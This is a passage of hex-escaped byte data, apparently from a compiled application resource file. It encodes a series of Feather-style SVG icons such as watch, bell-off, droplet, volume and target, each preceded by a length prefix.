\x30\x20\x31\x30\x20\x30\x20\x31\x20\x31\x2d\x35\x2e\x39\x33\x2d\
\x39\x2e\x31\x34\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x32\
\x32\x20\x34\x20\x31\x32\x20\x31\x34\x2e\x30\x31\x20\x39\x20\x31\
\x31\x2e\x30\x31\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x94\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x69\x6e\x69\x6d\
\x69\x7a\x65\x2d\x32\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\
\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x34\x20\x31\x34\x20\x31\x30\
\x20\x31\x34\x20\x31\x30\x20\x32\x30\x22\x3e\x3c\x2f\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\
\x70\x6f\x69\x6e\x74\x73\x3d\x22\x32\x30\x20\x31\x30\x20\x31\x34\
\x20\x31\x30\x20\x31\x34\x20\x34\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\
\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x34\x22\x20\x79\x31\x3d\x22\x31\x30\x22\x20\x78\x32\x3d\x22\x32\
\x31\x22\x20\x79\x32\x3d\x22\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x33\x22\x20\x79\x31\
\x3d\x22\x32\x31\x22\x20\x78\x32\x3d\x22\x31\x30\x22\x20\x79\x32\
\x3d\x22\x31\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\
\x76\x67\x3e\
\x00\x00\x01\x96\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x78\x2d\x6f\x63\x74\
\x61\x67\x6f\x6e\x22\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\
\x6f\x69\x6e\x74\x73\x3d\x22\x37\x2e\x38\x36\x20\x32\x20\x31\x36\
\x2e\x31\x34\x20\x32\x20\x32\x32\x20\x37\x2e\x38\x36\x20\x32\x32\
\x20\x31\x36\x2e\x31\x34\x20\x31\x36\x2e\x31\x34\x20\x32\x32\x20\
\x37\x2e\x38\x36\x20\x32\x32\x20\x32\x20\x31\x36\x2e\x31\x34\x20\
\x32\x20\x37\x2e\x38\x36\x20\x37\x2e\x38\x36\x20\x32\x22\x3e\x3c\
\x2f\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x31\x35\x22\x20\x79\x31\x3d\x22\x39\x22\x20\x78\x32\
\x3d\x22\x39\x22\x20\x79\x32\x3d\x22\x31\x35\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x39\x22\
\x20\x79\x31\x3d\x22\x39\x22\x20\x78\x32\x3d\x22\x31\x35\x22\x20\
\x79\x32\x3d\x22\x31\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x38\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6f\x72\x6e\x65\
\x72\x2d\x6c\x65\x66\x74\x2d\x75\x70\x22\x3e\x3c\x70\x6f\x6c\x79\
\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x34\x20\
\x39\x20\x39\x20\x34\x20\x34\x20\x39\x22\x3e\x3c\x2f\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\
\x32\x30\x20\x32\x30\x68\x2d\x37\x61\x34\x20\x34\x20\x30\x20\x30\
\x20\x31\x2d\x34\x2d\x34\x56\x34\x22\x3e\x3c\x2f\x70\x61\x74\x68\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xce\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x77\x61\x74\x63\x68\
\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\
\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x37\x22\x3e\
\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x32\x20\x39\x20\
\x31\x32\x20\x31\x32\x20\x31\x33\x2e\x35\x20\x31\x33\x2e\x35\x22\
\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\
\x68\x20\x64\x3d\x22\x4d\x31\x36\x2e\x35\x31\x20\x31\x37\x2e\x33\
\x35\x6c\x2d\x2e\x33\x35\x20\x33\x2e\x38\x33\x61\x32\x20\x32\x20\
\x30\x20\x30\x20\x31\x2d\x32\x20\x31\x2e\x38\x32\x48\x39\x2e\x38\
\x33\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2d\x31\x2e\
\x38\x32\x6c\x2d\x2e\x33\x35\x2d\x33\x2e\x38\x33\x6d\x2e\x30\x31\
\x2d\x31\x30\x2e\x37\x6c\x2e\x33\x35\x2d\x33\x2e\x38\x33\x41\x32\
\x20\x32\x20\x30\x20\x30\x20\x31\x20\x39\x2e\x38\x33\x20\x31\x68\
\x34\x2e\x33\x35\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\
\x20\x31\x2e\x38\x32\x6c\x2e\x33\x35\x20\x33\x2e\x38\x33\x22\x3e\
\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x12\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x64\x72\x6f\x70\x6c\
\x65\x74\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x32\
\x20\x32\x2e\x36\x39\x6c\x35\x2e\x36\x36\x20\x35\x2e\x36\x36\x61\
\x38\x20\x38\x20\x30\x20\x31\x20\x31\x2d\x31\x31\x2e\x33\x31\x20\
\x30\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\
\x3e\
\x00\x00\x01\xcc\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x62\x65\x6c\x6c\x2d\
\x6f\x66\x66\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\
\x33\x2e\x37\x33\x20\x32\x31\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x2d\x33\x2e\x34\x36\x20\x30\x22\x3e\x3c\x2f\x70\x61\x74\x68\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x38\x2e\x36\x33\
\x20\x31\x33\x41\x31\x37\x2e\x38\x39\x20\x31\x37\x2e\x38\x39\x20\
\x30\x20\x30\x20\x31\x20\x31\x38\x20\x38\x22\x3e\x3c\x2f\x70\x61\
\x74\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x36\x2e\x32\
\x36\x20\x36\x2e\x32\x36\x41\x35\x2e\x38\x36\x20\x35\x2e\x38\x36\
\x20\x30\x20\x30\x20\x30\x20\x36\x20\x38\x63\x30\x20\x37\x2d\x33\
\x20\x39\x2d\x33\x20\x39\x68\x31\x34\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x38\x20\x38\
\x61\x36\x20\x36\x20\x30\x20\x30\x20\x30\x2d\x39\x2e\x33\x33\x2d\
\x35\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x31\x22\x20\x79\x31\x3d\x22\x31\x22\x20\x78\x32\
\x3d\x22\x32\x33\x22\x20\x79\x32\x3d\x22\x32\x33\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x66\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x68\x65\x78\x61\x67\
\x6f\x6e\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x31\
\x20\x31\x36\x56\x38\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x2d\
\x31\x2d\x31\x2e\x37\x33\x6c\x2d\x37\x2d\x34\x61\x32\x20\x32\x20\
\x30\x20\x30\x20\x30\x2d\x32\x20\x30\x6c\x2d\x37\x20\x34\x41\x32\
\x20\x32\x20\x30\x20\x30\x20\x30\x20\x33\x20\x38\x76\x38\x61\x32\
\x20\x32\x20\x30\x20\x30\x20\x30\x20\x31\x20\x31\x2e\x37\x33\x6c\
\x37\x20\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x32\x20\
\x30\x6c\x37\x2d\x34\x41\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\
\x32\x31\x20\x31\x36\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x67\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x76\x6f\x6c\x75\x6d\
\x65\x2d\x32\x22\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\
\x69\x6e\x74\x73\x3d\x22\x31\x31\x20\x35\x20\x36\x20\x39\x20\x32\
\x20\x39\x20\x32\x20\x31\x35\x20\x36\x20\x31\x35\x20\x31\x31\x20\
\x31\x39\x20\x31\x31\x20\x35\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\
\x6f\x6e\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x39\x2e\
\x30\x37\x20\x34\x2e\x39\x33\x61\x31\x30\x20\x31\x30\x20\x30\x20\
\x30\x20\x31\x20\x30\x20\x31\x34\x2e\x31\x34\x4d\x31\x35\x2e\x35\
\x34\x20\x38\x2e\x34\x36\x61\x35\x20\x35\x20\x30\x20\x30\x20\x31\
\x20\x30\x20\x37\x2e\x30\x37\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x3b\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x72\x72\x6f\x77\
\x2d\x64\x6f\x77\x6e\x2d\x6c\x65\x66\x74\x22\x3e\x3c\x6c\x69\x6e\
\x65\x20\x78\x31\x3d\x22\x31\x37\x22\x20\x79\x31\x3d\x22\x37\x22\
\x20\x78\x32\x3d\x22\x37\x22\x20\x79\x32\x3d\x22\x31\x37\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\
\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x37\x20\x31\x37\x20\x37\
\x20\x31\x37\x20\x37\x20\x37\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x45\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x6f\x67\x67\x6c\
\x65\x2d\x72\x69\x67\x68\x74\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\
\x3d\x22\x31\x22\x20\x79\x3d\x22\x35\x22\x20\x77\x69\x64\x74\x68\
\x3d\x22\x32\x32\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x34\
\x22\x20\x72\x78\x3d\x22\x37\x22\x20\x72\x79\x3d\x22\x37\x22\x3e\
\x3c\x2f\x72\x65\x63\x74\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\
\x78\x3d\x22\x31\x36\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\
\x3d\x22\x33\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x42\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x74\x2d\x73\x69\
\x67\x6e\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\
\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x34\
\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x70\x61\x74\x68\
\x20\x64\x3d\x22\x4d\x31\x36\x20\x38\x76\x35\x61\x33\x20\x33\x20\
\x30\x20\x30\x20\x30\x20\x36\x20\x30\x76\x2d\x31\x61\x31\x30\x20\
\x31\x30\x20\x30\x20\x31\x20\x30\x2d\x33\x2e\x39\x32\x20\x37\x2e\
\x39\x34\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\
\x3e\
\x00\x00\x01\x50\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x61\x72\x67\x65\
\x74\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\
\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x31\x30\
\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x63\x69\x72\x63\
